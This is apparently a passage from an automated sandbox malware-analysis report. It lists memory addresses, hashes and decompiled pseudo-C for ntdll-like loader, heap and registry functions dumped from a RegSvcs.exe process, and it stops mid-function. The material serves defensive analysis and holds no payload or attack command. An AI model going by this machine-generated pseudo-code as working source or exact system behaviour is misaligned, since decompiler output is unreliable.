0x00aa0ef9
0x00aa0efe
0x00aa0f01
0x00aa0f01
0x00aa0f0b
0x00aa0f12
0x00aa0f16
0x00aa0f18
0x00aa0f1b
0x00aa0f2c
0x00aa0f31
0x00aa0f31
0x00aa0f35
0x00aa0f39
0x00aa0f3a
0x00aa0f3c
0x00aa0f3f
0x00aa0f50
0x00aa0f55
0x00aa0f55
0x00aa0f59
0x00a452eb
0x00a452f1
0x00a452f1
0x00aa0e7d
0x00aa0e84
0x00aa0e88
0x00aa0e8a
0x00aa0e8d
0x00aa0e9e
0x00aa0ea3
0x00aa0ea3
0x00aa0ea7
0x00aa0eaf
0x00aa0eb3
0x00aa0eb9
0x00aa0eb9
0x00aa0ebc
0x00aa0ecd
0x00aa0ecd
0x00000000
0x00aa0eb3
0x00aa0e21
0x00aa0e2b
0x00aa0e2f
0x00aa0e30
0x00aa0e3a
0x00aa0e3f
0x00aa0e41
0x00000000
0x00000000
0x00aa0e47
0x00000000
0x00aa0e47
0x00aa0df9
0x00aa0dfe
0x00000000
0x00000000
0x00000000
0x00aa0dfe
0x00a45303
0x00a45307
0x00000000
0x00a45309
0x00000000
0x00a45309
0x00a45307
0x00a452e9
0x00a452e9
0x00000000
0x00a452e9
0x00a4530e
0x00000000

Strings

X,R, xrefs: 00A452C4, 00AA0E70, 00AA0EE0

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: X,R
API String ID: 0-565902700
Opcode ID: b9b605728823ac2fc0ec69f7b738c3b4bc9829c0f61ac4af7da9cc4791cbb331
Instruction ID: e077bb64a4cbbd7139c9c644958f1ad4a262f914400525bf6372b4c383aedb89
Opcode Fuzzy Hash: b9b605728823ac2fc0ec69f7b738c3b4bc9829c0f61ac4af7da9cc4791cbb331
Instruction Fuzzy Hash: 2251DF71245741AFC321EF68C942B2BBBE4FF94710F24492EF89587692EB74E804C792

Uniqueness

Uniqueness Score: -1.00%

Function 00B10EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B10EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E00B0FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00B11074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00A89730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00B0A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00B0A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xb38b04 >> 0x14) + (_v44 -  *0xb38b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00A67D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00B0138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00A67D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00AFFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xb38724 & 0x00000008) != 0) {
						E00B052F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00B115B5(0xb38ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x00b10eb7
0x00b10eb9
0x00b10ec0
0x00b10ec2
0x00b10ecd
0x00b1105b
0x00b1105b
0x00b11061
0x00b11066
0x00b11066
0x00b1106b
0x00b11073
0x00b11073
0x00b10ed3
0x00b10ed6
0x00b10edc
0x00b10ee0
0x00b10ee7
0x00b10ef0
0x00b10ef5
0x00b10efa
0x00b10efc
0x00b10efd
0x00b10f03
0x00b10f04
0x00b10f06
0x00b10f07
0x00b10f09
0x00b10f0e
0x00b10f14
0x00b10f23
0x00b10f2d
0x00b10f34
0x00b10f34
0x00b10f14
0x00b10f52
0x00000000
0x00000000
0x00b10f58
0x00b10f73
0x00b10f74
0x00b10f79
0x00b10f7d
0x00b10f80
0x00b10f86
0x00b10fab
0x00b10fb5
0x00b10fc6
0x00b10fd1
0x00b10fe3
0x00b10fd3
0x00b10fdc
0x00b10fdc
0x00b10feb
0x00b11009
0x00b11009
0x00b11015
0x00b11027
0x00b11017
0x00b11020
0x00b11020
0x00b1102f
0x00b1103c
0x00b1103c
0x00b11048
0x00b11050
0x00b11050
0x00b11055
0x00000000
0x00b11055
0x00b10f88
0x00b10f9e
0x00b10fa2
0x00b10fa9
0x00000000
0x00000000
0x00000000
0x00b10fa9
0x00000000

Strings

`, xrefs: 00B10F16

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: b34bb5826197c784a8752148157db7aa22c17ba24c56373982609588f852c93d
Instruction ID: 89582ca95838124f961f311f3d0d2cedd683d177ae2acccf56d5e95abb091659
Opcode Fuzzy Hash: b34bb5826197c784a8752148157db7aa22c17ba24c56373982609588f852c93d
Instruction Fuzzy Hash: D651EF702043429FD324DF28D885B6BB7E5EBC8304F5449ACFA8297291D770EC86CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A7F0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A7F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00A64120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00A89830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00A89990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00A895D0();
							goto L11;
						} else {
							_t109 = L00A64620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00A8F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00A895D0();
										L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x00a7f0d3
0x00a7f0d9
0x00a7f0e0
0x00a7f0e7
0x00a7f0f2
0x00a7f0f4
0x00a7f0f8
0x00a7f100
0x00a7f108
0x00a7f10d
0x00a7f115
0x00a7f116
0x00a7f11f
0x00a7f123
0x00a7f124
0x00a7f12c
0x00a7f130
0x00a7f134
0x00a7f13d
0x00a7f144
0x00a7f14b
0x00a7f152
0x00abbab0
0x00abbab0
0x00a7f158
0x00a7f158
0x00a7f15a
0x00a7f160
0x00a7f165
0x00a7f166
0x00a7f16f
0x00a7f173
0x00abbaa7
0x00abbaa7
0x00abbaab
0x00000000
0x00a7f179
0x00a7f18d
0x00a7f191
0x00abbaa2
0x00000000
0x00a7f197
0x00a7f19b
0x00a7f1a2
0x00a7f1a9
0x00a7f1af
0x00a7f1b2
0x00a7f1b6
0x00a7f1b9
0x00a7f1c4
0x00a7f1d8
0x00a7f1df
0x00a7f1e3
0x00a7f1eb
0x00a7f1ee
0x00a7f1f4
0x00a7f20f
0x00abbab7
0x00abbabb
0x00abbacc
0x00abbad1
0x00a7f215
0x00a7f218
0x00a7f226
0x00a7f22b
0x00000000
0x00a7f22b
0x00a7f1f6
0x00a7f1f6
0x00a7f1f9
0x00a7f1fb
0x00a7f1fb
0x00a7f1f4
0x00a7f191
0x00a7f173
0x00a7f152
0x00a7f203

Strings

@, xrefs: 00A7F124

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 535a49673cbde75b86205202ea646a1d888f45f564a817243d5ab16a2537c80f
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 5E519F715047109FC321DF19C841A6BBBF8FF48750F108A2DF99597691E7B4E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC3540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00AC3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xb3d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00A80BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00AC3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00A8FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00AC3540;
						E00A8FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00A9DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00AD0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00A897C0();
					}
					return E00A8B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00AC3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00AC3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00A8FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00A89650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00AC3787(_a4,  &_v352, _t80);
						}
					}
					L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00A895D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00ac3552
0x00ac355a
0x00ac355d
0x00ac3566
0x00ac3567
0x00ac357e
0x00ac358f
0x00ac35a1
0x00ac35a5
0x00ac366b
0x00ac366b
0x00ac366d
0x00ac3672
0x00ac3679
0x00ac3685
0x00ac368d
0x00ac369d
0x00ac36a7
0x00ac36b8
0x00ac36c6
0x00ac36c7
0x00ac36dc
0x00ac36e1
0x00ac36e7
0x00ac36e9
0x00ac36e9
0x00ac3703
0x00ac3703
0x00ac35b5
0x00ac35c0
0x00ac35c4
0x00000000
0x00000000
0x00ac35ca
0x00ac35d7
0x00ac35e2
0x00ac35e6
0x00ac35e8
0x00ac35f5
0x00ac35fa
0x00ac3603
0x00ac3604
0x00ac3609
0x00ac360a
0x00ac3612
0x00ac3613
0x00ac361e
0x00ac3622
0x00ac3628
0x00ac362f
0x00ac362f
0x00ac3636
0x00ac3638
0x00ac363b
0x00ac3642
0x00ac3642
0x00ac3636
0x00ac3657
0x00ac3657
0x00ac365c
0x00ac3662
0x00ac3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 00AC358F

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: bc976bdfd7e008a75575c863a72c79cb044ed98d2837713d39cfdf44bfe0b21f
Instruction ID: 36ec2bb16d14211ca9f3af77495fc94b92831199f5c150f89ddebce0d8292eaa
Opcode Fuzzy Hash: bc976bdfd7e008a75575c863a72c79cb044ed98d2837713d39cfdf44bfe0b21f
Instruction Fuzzy Hash: 294133B290052DABDF21DA54CD81FEEB77CAB44714F0185A9AA09A7241DB709F888F94

Uniqueness

Uniqueness Score: -1.00%

Function 00B105AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00B105AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00B107DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00A89730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00B0A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00B0A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00B11293(_t79, _v40, E00B107DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00A67D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00B0138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x00b105c5
0x00b105ca
0x00b105d3
0x00b106db
0x00b106db
0x00b106dd
0x00b106e3
0x00b106e3
0x00b105dd
0x00b105e7
0x00b105f6
0x00b10600
0x00b10607
0x00b10610
0x00b10615
0x00b1061a
0x00b1061c
0x00b1061e
0x00b10624
0x00b10625
0x00b10627
0x00b10628
0x00b10631
0x00b10640
0x00b1064d
0x00b10654
0x00b10654
0x00b10631
0x00b1066d
0x00b10674
0x00000000
0x00000000
0x00b10692
0x00b1069e
0x00b106b0
0x00b106a0
0x00b106a9
0x00b106a9
0x00b106b8
0x00b106d6
0x00b106d6
0x00000000

Strings

`, xrefs: 00B10633

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: f16cab247bceaead1e1ae95ee5f04d11e15553a6f3955462e2a03d7fd85d9d9b
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 7531F3323143056BE710EE24CD85F9B7BD9EB84754F044669FA54DB2C0D6B0ED94CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC3884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00AC3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00A89650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00A64620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00A89650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x00ac3893
0x00ac3896
0x00ac3899
0x00ac389f
0x00ac38a0
0x00ac38a4
0x00ac38a9
0x00ac38ac
0x00ac38ad
0x00ac38ae
0x00ac38af
0x00ac38b1
0x00ac38b4
0x00ac38bb
0x00ac38bc
0x00ac38bd
0x00ac38c4
0x00ac38c8
0x00ac38ca
0x00ac38ca
0x00ac38d5
0x00ac393e
0x00ac3940
0x00ac3942
0x00ac3952
0x00ac3954
0x00ac3961
0x00ac3961
0x00ac3967
0x00ac396e
0x00ac396e
0x00ac3947
0x00ac394c
0x00000000
0x00ac394c
0x00ac38ea
0x00ac38ee
0x00ac38f8
0x00ac38f9
0x00ac38ff
0x00ac3900
0x00ac3902
0x00ac3903
0x00ac390b
0x00ac390f
0x00ac3950
0x00000000
0x00ac3950
0x00ac3915
0x00ac391d
0x00ac391d
0x00ac3922
0x00ac3926
0x00000000
0x00ac3928
0x00ac392b
0x00ac392b
0x00ac3935
0x00ac3937
0x00ac3937
0x00000000
0x00ac3935
0x00ac3926
0x00ac38f0
0x00000000

Strings

BinaryName, xrefs: 00AC38B4

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 601f73aeac44bce3893af1ac38e631080e1268f0d067ace7f5db771ea736b550
Instruction ID: 0ddec24a2add3fb6b354ccb1b6fdf9d247e3c17f375c78b2e76d46a335389aec
Opcode Fuzzy Hash: 601f73aeac44bce3893af1ac38e631080e1268f0d067ace7f5db771ea736b550
Instruction Fuzzy Hash: 5C310E3790151AAFEF15DB59C951EAFB774EB80B20F02812DE915A7280D6709F00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A7D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00A7D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xb3d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00A64120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00A8B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00A898D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00A895D0();
					L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x00a7d29c
0x00a7d2a6
0x00a7d2b1
0x00a7d2b5
0x00a7d2b6
0x00a7d2bc
0x00a7d2bd
0x00a7d2be
0x00a7d2bf
0x00a7d2c2
0x00a7d2c4
0x00a7d2cc
0x00a7d384
0x00a7d34b
0x00a7d34f
0x00a7d350
0x00a7d351
0x00a7d35c
0x00a7d35c
0x00a7d2d6
0x00a7d2da
0x00a7d2e1
0x00a7d361
0x00a7d369
0x00a7d36d
0x00a7d2e3
0x00a7d2e3
0x00a7d2e3
0x00a7d2e5
0x00a7d2ed
0x00a7d2f5
0x00a7d2fa
0x00a7d302
0x00a7d303
0x00a7d30b
0x00a7d30f
0x00a7d313
0x00a7d318
0x00a7d31c
0x00a7d320
0x00a7d379
0x00a7d37d
0x00000000
0x00000000
0x00abaffe
0x00abb001
0x00abb011
0x00000000
0x00a7d322
0x00a7d322
0x00a7d330
0x00a7d337
0x00a7d35d
0x00a7d339
0x00a7d33f
0x00a7d38c
0x00a7d38c
0x00a7d33f
0x00a7d349
0x00000000
0x00a7d349

Strings

@, xrefs: 00A7D303

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 3f301a4cd2d00f4d7fdd4f10b360bd3a3caa595045dcb261764bdbd0ab2c51ee
Instruction ID: 3350f0aea395841b75ed35d0b9c7102831bd12f46514858b8b4b261ddc6107b7
Opcode Fuzzy Hash: 3f301a4cd2d00f4d7fdd4f10b360bd3a3caa595045dcb261764bdbd0ab2c51ee
Instruction Fuzzy Hash: 9E3178B5508305AFC311DF28C9819ABBBF8EF89754F10892EB99997211E734DD04CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00A51B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00A51B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00A8BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00A8A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00A8A9B0();
								if(_t30 < 0) {
									L12:
